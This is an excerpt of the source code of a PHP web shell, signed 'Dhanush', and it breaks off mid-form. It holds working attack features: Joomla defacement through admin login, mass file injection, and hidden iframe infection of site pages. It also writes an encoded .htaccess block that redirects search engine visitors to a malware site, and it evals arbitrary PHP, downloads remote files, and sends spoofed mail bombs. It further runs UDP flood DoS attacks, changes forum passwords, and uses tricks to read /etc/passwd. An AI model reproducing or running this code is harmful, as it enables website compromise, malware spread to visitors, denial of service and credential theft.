2098 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2099 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2100 curl_setopt($ch, CURLOPT_HEADER, 0);
2101 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2102 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2103 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2104 $buffer = curl_exec($ch);
2105
2106 $pos = strpos($buffer,"com_config");
2107 if($pos === false)
2108 {
2109 echo("<br>[-] Login Error");
2110 exit;
2111 }
2112
2113 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2114 $ch = curl_init();
2115 curl_setopt($ch, CURLOPT_URL, $url2);
2116 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2117 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2118 curl_setopt($ch, CURLOPT_HEADER, 0);
2119 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2120 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2121
2122 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2123 $buffer = curl_exec($ch);
2124
2125 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
2126 if(!$hidden2)
2127 {
2128 echo("<br>[-] index.php Not found in Theme Editor");
2129 exit;
2130 }
2131
2132 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2133
2134 $ch = curl_init();
2135 curl_setopt($ch, CURLOPT_URL, $url2);
2136 curl_setopt($ch, CURLOPT_POST, 1);
2137 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2138
2139 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2140 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2141 curl_setopt($ch, CURLOPT_HEADER, 0);
2142 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2143 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2144 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2145 $buffer = curl_exec($ch);
2146
2147 $pos = strpos($buffer,'<dd class="message message">');
2148 if($pos === false)
2149 {
2150 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2151 }
2152 else
2153 {
2154 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2155 }
2156 }
2157 else
2158 {
2159 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
2160 $data = mysql_fetch_array($req);
2161 $template_name=$data["template"];
2162
2163 $url2=$site_url."/index.php";
2164 $ch = curl_init();
2165 curl_setopt($ch, CURLOPT_URL, $url2);
2166 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2167 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2168 curl_setopt($ch, CURLOPT_HEADER, 1);
2169 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2170 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2171 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2172 $buffer = curl_exec($ch);
2173
2174 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
2175
2176 $url2=$site_url."/index.php";
2177 $ch = curl_init();
2178 curl_setopt($ch, CURLOPT_URL, $url2);
2179 curl_setopt($ch, CURLOPT_POST, 1);
2180 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
2181 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2182 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2183 curl_setopt($ch, CURLOPT_HEADER, 0);
2184 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2185 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2186 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2187 $buffer = curl_exec($ch);
2188
2189 $pos = strpos($buffer,"com_config");
2190
2191 if($pos === false)
2192 {
2193 echo("<br>[-] Login Error");
2194 exit;
2195 }
2196
2197 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2198 $ch = curl_init();
2199 curl_setopt($ch, CURLOPT_URL, $url2);
2200 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2201 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2202 curl_setopt($ch, CURLOPT_HEADER, 0);
2203 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2204 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2205 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2206 $buffer = curl_exec($ch);
2207
2208 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
2209
2210 if(!$hidden2)
2211 {
2212 echo("<br>[-] index.php Not found in Theme Editor");
2213 }
2214
2215 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2216 $ch = curl_init();
2217 curl_setopt($ch, CURLOPT_URL, $url2);
2218 curl_setopt($ch, CURLOPT_POST, 1);
2219 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2220 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2221 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2222 curl_setopt($ch, CURLOPT_HEADER, 0);
2223 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2224 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2225 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2226 $buffer = curl_exec($ch);
2227
2228 $pos = strpos($buffer,'<dd class="message message fade">');
2229 if($pos === false)
2230 {
2231 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2232 exit;
2233 }
2234 else
2235 {
2236 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2237 }
2238 }
2239 }
2240}
2241else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
2242{
2243 $filetype = $_POST['filetype'];
2244
2245 $mode = "a";
2246
2247 if($_POST['mode'] == 'Apender')
2248 $mode = "a";
2249
2250 if($_POST['mode'] == 'Overwriter')
2251 $mode = "w";
2252
2253 if (is_dir($_POST['pathtomass']))
2254 {
2255 $lolinject = $_POST['injectthis'];
2256 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
2257 if(substr($_POST['pathtomass'], -1) == "\\")
2258 $mypath = $_POST['pathtomass'] . "*.".$filetype;
2259 foreach (glob($mypath) as $injectj00)
2260 {
2261 if($injectj00 == __FILE__)
2262 continue;
2263 $fp=fopen($injectj00,$mode);
2264 if (fputs($fp,$lolinject))
2265 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
2266 else
2267 echo 'failed to inject '.$injectj00.'<br>';
2268 }
2269 }
2270 else
2271 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
2272}
2273else if(isset($_POST['mailfunction']))
2274{
2275 if($_POST['mailfunction'] == "dobombing")
2276 {
2277 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
2278 {
2279 $times = $_POST['times'];
2280 while($times--)
2281 {
2282 if(isset($_POST['padding']))
2283 {
2284 $fromPadd = rand(0,9999);
2285 $subjectPadd = " -- ID : ".rand(0,9999999);
2286 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
2287
2288 }
2289 $from = "president$fromPadd@whitehouse.gov";
2290 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
2291 {
2292 $error = 1;
2293 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
2294 break;
2295 }
2296 }
2297 if($error != 1)
2298 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
2299 }
2300 }
2301 else if($_POST['mailfunction'] == "massmailing")
2302 {
2303 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
2304 {
2305 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
2306 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
2307 else
2308 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
2309 }
2310 }
2311}
2312else if(isset($_POST['code']))
2313{
2314 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
2315 {
2316 // FIlter Some Chars we dont need
2317 ?><br>
2318 <textarea name="code" class="box" cols="120" rows="10"><?php
2319 $code = str_replace("<?php","",$_POST['code']);
2320 $code = str_replace("<?","",$code);
2321 $code = str_replace("?>","",$code);
2322
2323 // Evaluate PHP CoDE!
2324 htmlspecialchars(eval($code));
2325 ?>
2326 </textarea><?php
2327 }
2328 else if($_POST['code'] != null && $_POST['intext'] == "false")
2329 {
2330 $code = str_replace("<?php","",$_POST['code']);
2331 $code = str_replace("<?","",$code);
2332 $code = str_replace("?>","",$code);
2333
2334 // Evaluate PHP CoDE!
2335 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
2336 }
2337}
2338else if(isset($_GET['infect']))
2339{
2340 $coun = 0;
2341 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
2342 foreach (glob($_GET['path'] . "*.php") as $injectj00)
2343 {
2344 if($injectj00 == __FILE__)
2345 continue;
2346 if($myfile=fopen($injectj00,'a'))
2347 {
2348 fputs($myfile, $str);
2349 fclose($myfile);
2350 $coun = 1;
2351 }
2352 }
2353 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2354 {
2355 if($myfile=fopen($injectj00,'a'))
2356 {
2357 fputs($myfile, $str);
2358 fclose($myfile);
2359 $coun = 1;
2360 }
2361 }
2362 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2363 {
2364 if($myfile=fopen($injectj00,'a'))
2365 {
2366 fputs($myfile, $str);
2367 fclose($myfile);
2368 $coun = 1;
2369 }
2370 }
2371
2372
2373 if($coun == 1)
2374 echo "<center>Done !!!!<center>";
2375 else
2376 echo "<center>Cannot open files !!!!<center>";
2377}
2378else if(isset($_GET['redirect']))
2379{
2380 if($myfile = fopen(".htaccess",'a'))
2381 {
2382 $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
2383 fwrite($myfile, gzuncompress(base64_decode($mal)));
2384 fwrite($myfile, "\n\r");
2385 fclose($myfile);
2386 echo "<center>Done !!!!<center>";
2387 }
2388 else
2389 echo "<center>Cannot open file !!!!<center>";
2390}
2391else if(isset($_GET['malware']))
2392{ ?>
2393 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
2394 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
2395 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
2396 <div id="showmal"></div>
2397 <?php
2398}
2399else if(isset($_GET['codeinsert']))
2400{
2401 if($file1 = fopen(".htaccess",'r'))
2402 {
2403 ?><div id="showcode"></div>
2404 <form method=post>
2405 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
2406 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
2407 </form>
2408 <?php }
2409 else
2410 echo "<center>Cannot Open File!!</center>";
2411}
2412else if(isset($_POST['getcode']))
2413{
2414 if($myfile = fopen(".htaccess",'a'))
2415 {
2416 fwrite($myfile, $_POST['getcode']);
2417 fwrite($myfile, "\n\r");
2418 fclose($myfile);
2419 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
2420 }
2421 else
2422 echo "Permission Denied";
2423}
2424else if(isset($_GET['uploadurl']))
2425{
2426 $functiontype = trim($_GET['functiontype']);
2427 $wurl = trim($_GET['wurl']);
2428 $path = magicboom($_GET['path']);
2429
2430 function remotedownload($cmd,$url)
2431 {
2432 $namafile = basename($url);
2433 switch($cmd)
2434 {
2435 case 'wwget':
2436 execmd(which('wget')." ".$url." -O ".$namafile);
2437 break;
2438 case 'wlynx':
2439 execmd(which('lynx')." -source ".$url." > ".$namafile);
2440 break;
2441 case 'wfread' :
2442 execmd($wurl,$namafile);
2443 break;
2444 case 'wfetch' :
2445 execmd(which('fetch')." -o ".$namafile." -p ".$url);
2446 break;
2447 case 'wlinks' :
2448 execmd(which('links')." -source ".$url." > ".$namafile);
2449 break;
2450 case 'wget' :
2451 execmd(which('GET')." ".$url." > ".$namafile);
2452 break;
2453 case 'wcurl' :
2454 execmd(which('curl')." ".$url." -o ".$namafile);
2455 break;
2456 default:
2457 break;
2458 }
2459 return $namafile;
2460 }
2461 $namafile = remotedownload($functiontype,$wurl);
2462 $fullpath = $path . $directorysperator . $namafile;
2463 if(is_file($fullpath))
2464 {
2465 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
2466 }
2467 else
2468 echo "<center>Failed to upload $namafile</center>";
2469}
2470else if(isset($_GET['createfolder']))
2471{
2472 if(!mkdir($_GET['createfolder']))
2473 echo "Failed To create";
2474 else
2475 echo "<font class=txt>Folder Created Successfully</font>";
2476}
2477else if(isset($_GET['selfkill']))
2478{
2479 if(unlink(__FILE__))
2480 echo "<br><center><font size=5>Good Bye......</font></center>";
2481 else
2482 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
2483}
2484else if(isset($_GET['Create']))
2485{
2486 ?>
2487 <form method="post">
2488 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
2489 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
2490 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
2491 </form>
2492
2493<?php }
2494else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
2495{
2496 $content = $_POST['filecontent'];
2497 if($file_pointer = fopen($_POST['filecreator'], "w+"))
2498 {
2499 fwrite($file_pointer, $content);
2500 fclose($file_pointer);
2501 echo "<font class=txt>File Created Successfully</font>";
2502 }
2503 else
2504 echo "Cannot Create File";
2505}
2506else if(isset($_REQUEST["defaceforum"]))
2507{
2508 ?>
2509 <center><div id="showdeface"></div>
2510 <font color="#FF0000" size="4">Forum Index Changer</font>
2511 <form action="<?php echo $self; ?>" method = "POST">
2512 <input type="hidden" name="forum">
2513 <input type="hidden" name="defaceforum">
2514 <table border = "1" width="60%" style="text-align: center;border-color:#333333;" align="center">
2515 <tr>
2516 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
2517
2518 <td width="50%"><b> Database :</b> <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
2519 <tr><td height="50" width="50%"><b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> </td>
2520 <td><b> Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2521
2522 <tr><td height="50" width="50%">Type :
2523 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
2524 <option value="vb">vbulletin</option>
2525 <option value="mybb">Mybb</option>
2526 <option value="smf">SMF</option>
2527 <option value="ipb">IPB</option>
2528 <option value="wp">Wordpress</option>
2529 <option value="joomla">Joomla</option>
2530 </select></td>
2531 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
2532
2533 </tr>
2534 <tr>
2535 <td height="167" width="50%" colspan=2>
2536 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
2537
2538 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
2539 <label id="wordpres" style="display:none; float:right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="checked"> All</label></p>
2540 </div>
2541
2542 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
2543 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
2544 </td>
2545 </tr>
2546 </table>
2547 </form>
2548 </center>
2549 <?php
2550 }
2551 else if(isset($_GET["passwordchange"]))
2552 {
2553 echo "<center>";
2554 ?>
2555 <div id="showchangepass"></div>
2556 <font color="#FF0000" size="4">Forum Password Changer</font>
2557 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value);return false;">
2558 <table border = "1" width="60%" height="246" style="text-align: center;border-color:#333333;" align="center">
2559 <tr>
2560 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> <b> DataBase :</b> <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> <b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> <b>Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2561 <tr>
2562 <td height="50" width="50%">Type :
2563 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
2564 <option value="vb">vbulletin</option>
2565 <option value="mybb">Mybb</option>
2566 <option value="smf">SMF</option>
2567 <option value="ipb">IPB</option>
2568 <option value="phpbb">PHPBB</option>
2569 <option value="wp">Wordpress</option>
2570 <option value="joomla">Joomla</option>
2571 </select></td>
2572 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
2573 </tr>
2574 <tr>
2575 <td colspan=2 height="100" width="780">
2576
2577 <p align="center"><div id="fid" style="display:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
2578
2579 <div id="joomla" style="display:none;"><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> <b>New Password :</b> <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
2580
2581 <div id="wpress" style="display:none;"><p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"></div>
2582
2583 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
2584 </tr>
2585 </table>
2586 </form>
2587 </center>
2588 <?php
2589}
2590else if(isset($_GET['dosser']))
2591{
2592 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
2593 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
2594 {
2595 $IP=$_GET['ip'];
2596 $port=$_GET['port'];
2597 $executionTime = $_GET['exTime'];
2598 $no0fBytes = $_GET['no0fBytes'];
2599 $data = "";
2600 $timeout = $_GET['timeout'];
2601 $packets = 0;
2602 $counter = $no0fBytes;
2603 $maxTime = time() + $executionTime;;
2604 while($counter--)
2605 {
2606 $data .= "X";
2607 }
2608 $data .= " Dhanush";
2609
2610 while(1)
2611 {
2612 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
2613 if($socket)
2614 {
2615 fwrite($socket , $data);
2616 fclose($socket);
2617 $packets++;
2618 }
2619 if(time() >= $maxTime)
2620 {
2621 break;
2622 }
2623 }
2624 echo "Dos Completed!<br>";
2625 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
2626 echo "Total Number of Packets Sent : " . $packets . "<br />";
2627 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
2628 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
2629 }
2630}
2631else if(isset($_GET['fuzzer']))
2632{
2633 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
2634 {
2635 $IP=$_GET['ip'];
2636 $port=$_GET['port'];
2637 $times = $_GET['exTime'];
2638 $timeout = $_GET['timeout'];
2639 $send = 0;
2640 $ending = "";
2641 $multiplier = $_GET['multiplier'];
2642 $data = "";
2643 $mode="tcp";
2644 $data .= "GET /";
2645 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
2646 if($_GET['type'] == "tcp")
2647 {
2648 $mode = "tcp";
2649 }
2650
2651 while($multiplier--)
2652 {
2653 $data .= urlencode($_GET['no0fBytes']);
2654 }
2655 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
2656 $data .= "by-Dhanush".$ending;
2657 $length = strlen($data);
2658
2659
2660 echo "Sending Data :- <br /> <p align='center'>$data</p>";
2661
2662 for($i=0;$i<$times;$i++)
2663 {
2664 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
2665 if($socket)
2666 {
2667 fwrite($socket , $data , $length );
2668 fclose($socket);
2669 }
2670 }
2671 echo "Fuzzing Completed!<br>";
2672 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
2673 echo "Total Number of Packets Sent : " . $times . "<br />";
2674 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
2675 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
2676 }
2677}
2678else if(isset($_GET['bypassit']))
2679{
2680 if(isset($_GET['copy']))
2681 {
2682 if(@copy($_GET['copy'],"test1.php"))
2683 {
2684 $fh=fopen("test1.php",'r');
2685 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
2686 @fclose($fh);
2687 unlink("test1.php");
2688 }
2689 }
2690 else if(isset($_GET['imap']))
2691 {
2692 $string = $_GET['imap'];
2693 echo "<textarea cols=120 rows=20 class=box readonly>";
2694 $stream = imap_open($string, "", "");
2695 $str = imap_body($stream, 1);
2696 echo "</textarea>";
2697 }
2698 else if(isset($_GET['sql']))
2699 {
2700 echo "<textarea cols=120 rows=20 class=box readonly>";
2701 $file=$_GET['sql'];
2702
2703 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2704 $mysql_files = explode(':', $mysql_files_str);
2705
2706 $sql = array (
2707 "USE $mdb",
2708 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
2709 "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
2710 . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
2711 . "ESCAPED BY '' "
2712 . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
2713
2714 "SELECT a FROM $tbl LIMIT 1"
2715 );
2716 mysql_connect ($mhost, $muser, $mpass);
2717
2718 foreach ($sql as $statement) {
2719 $q = mysql_query ($statement);
2720
2721 if ($q == false) die (
2722 "FAILED: " . $statement . "\n" .
2723 "REASON: " . mysql_error () . "\n"
2724 );
2725
2726 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
2727
2728 echo htmlspecialchars($r[0]);
2729 mysql_free_result ($q);
2730 }
2731 echo "</textarea>";
2732 }
2733 else if(isset($_GET['curl']))
2734 {
2735 $ch=curl_init("file://" . $_GET[curl]);
2736 curl_setopt($ch,CURLOPT_HEADERS,0);
2737 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2738 $file_out=curl_exec($ch);
2739 curl_close($ch);
2740 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
2741 }
2742 else if(isset($_GET['include']))
2743 {
2744 if(file_exists($_GET['include']))
2745 {
2746 echo "<textarea cols=120 rows=20 class=box readonly>";
2747 @include($_GET['include']);
2748 echo "</textarea>";
2749 }
2750 else
2751 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
2752 }
2753 else if(isset($_GET['id']))
2754 {
2755 echo "<textarea cols=120 rows=20 class=box readonly>";
2756 for($uid=0;$uid<60000;$uid++)
2757 { //cat /etc/passwd
2758 $ara = posix_getpwuid($uid);
2759 if (!empty($ara))
2760 {
2761 while (list ($key, $val) = each($ara))
2762 {
2763 print "$val:";
2764 }
2765 print "\n";
2766 }
2767 }
2768 echo "</textarea>";
2769 break;
2770 }
2771 else if(isset($_GET['tempnam']))
2772 {
2773 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
2774 $fp = fopen ( $mytmp, 'r' );
2775 while(!feof($fp))
2776 echo fgets($fp);
2777 fclose ( $fp );
2778 }
2779 else if(isset($_GET['symlnk']))
2780 {
2781 echo "<textarea cols=120 rows=20 class=box readonly>";
2782 @mkdir("mydhanush",0777);
2783 @chdir("mydhanush");
2784 execmd("ln -s /etc/passwd");
2785
2786 echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
2787 echo "</textarea>";
2788 }
2789 if(isset($_GET['newtype']))
2790 {
2791 $filename = $_GET['newtype'];
2792 echo "<textarea cols=120 rows=20 class=box readonly>";
2793 if($_GET['optiontype'] == "xxd")
2794 echo execmd("xxd ".$filename);
2795 else if($_GET['optiontype'] == "rev")
2796 echo execmd("rev ".$filename);
2797 if($_GET['optiontype'] == "tac")
2798 echo execmd("tac ".$filename);
2799 if($_GET['optiontype'] == "more")
2800 echo execmd("more ".$filename);
2801 if($_GET['optiontype'] == "less")
2802 echo execmd("less ".$filename);
2803 echo "</textarea>";
2804 }
2805}
2806// Deface Website: overwrites the file named in ?deface= with the base64-encoded page held in $ind (no path check; failure only means the file was not writable)
2807else if(isset($_GET['deface']))
2808{
2809 $myfile = fopen($_GET['deface'],'w');
2810 if(fwrite($myfile, base64_decode($ind)))
2811 {fclose($myfile);
2812 echo "Index Defaced Successfully";}
2813 else
2814 echo "Donot have write permission";
2815}
2816else if(isset($_GET['perms']))
2817{
2818?>
2819 <form>
2820 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
2821 <table align="center" border="1" style="width:40%;border-color:#333333;">
2822 <tr>
2823 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
2824 </tr>
2825 <tr>
2826 <td colspan="2" align="center" style="height:60px">
2827 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
2828 </tr>
2829 </table>
2830
2831 </form>
2832 <?php
2833}
2834else if(isset($_GET["chmode"]))
2835{
2836 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
2837 {
2838 $perms = 0;
2839 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
2840 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
2841 if(@chmod($_GET['myfilename'],$perms))
2842 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
2843 else
2844 echo "<center><blink>Cannot Change File Permissions</blink></center>";
2845 }
2846}
2847else if(isset($_GET['rename']))
2848{
2849?>
2850 <form>
2851 <table border="0" cellpadding="3" cellspacing="3">
2852 <tr>
2853 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
2854 </tr>
2855 <tr>
2856 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
2857 </tr>
2858 <tr>
2859 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/></td>
2860 </tr>
2861 </table>
2862 </form>
2863 <?php
2864
2865}
2866else if(isset($_GET['renamemyfile']))
2867{
2868 if(isset($_GET['to']) && isset($_GET['file']))
2869 {
2870 if(!rename($_GET['file'], $_GET['to']))
2871 echo "Cannot Rename File";
2872 else
2873 echo "<font class=txt>File Renamed Successfully</font>";
2874
2875 }
2876}
2877else if(isset($_GET['open']))
2878{
2879 if(is_file($_GET['myfilepath']))
2880 {
2881 $owner = "0/0";
2882 if($os == "Linux")
2883 $owner = getOGid($_GET['myfilepath']);
2884 ?>
2885 <form>
2886 <table style="width:57%;">
2887 <tr align="left">
